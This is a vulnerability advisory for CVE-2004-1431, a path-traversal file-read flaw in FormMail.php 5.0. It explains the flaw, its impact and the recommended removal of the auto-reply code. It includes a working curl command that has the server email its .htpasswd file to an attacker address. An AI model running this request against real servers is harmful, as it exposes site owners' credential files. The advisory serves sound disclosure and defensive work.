CVE-2004-1431

Vulnerability

In FormMail.php version 5.0 (and possibly others), the script accepts an ar_file parameter intended for auto-reply functionality. The script uses file_exists() and fopen() to read the file specified in ar_file and send its contents via email. This parameter is not sanitized, allowing an attacker to specify a path to any file on the server, including sensitive files like .htpasswd. The vulnerability is present in the default configuration and requires no special conditions beyond the ability to send a POST request to the script [1].

Exploitation

An attacker can exploit this by sending a POST request with the ar_file parameter set to a full path or relative path (e.g., ../members/.htpasswd) and an email parameter. The script will then read the specified file and email its contents to the attacker's provided address. No authentication or user interaction is required; only network access to the script is needed. An example using curl: curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d email=attacker@example.com http://yoursite.com/cgi-bin/formmail.php [1].

Impact

Successful exploitation allows an attacker to read arbitrary files from the server, leading to information disclosure of sensitive data such as password files, configuration files, or source code. The attacker gains no direct execution but obtains file contents via email, which can be used for further attacks [1].

Mitigation

The recommended fix is to remove the auto-reply code block that reads and emails ar_file. The Bugtraq post [1] provides the exact code to remove. Alternatively, the vendor should implement proper validation and sanitization of the ar_file parameter. No official patch from Jack's Scripts was mentioned; users should apply the workaround or disable the vulnerable script. The vulnerability was disclosed without a fix, so manual mitigation is required [1].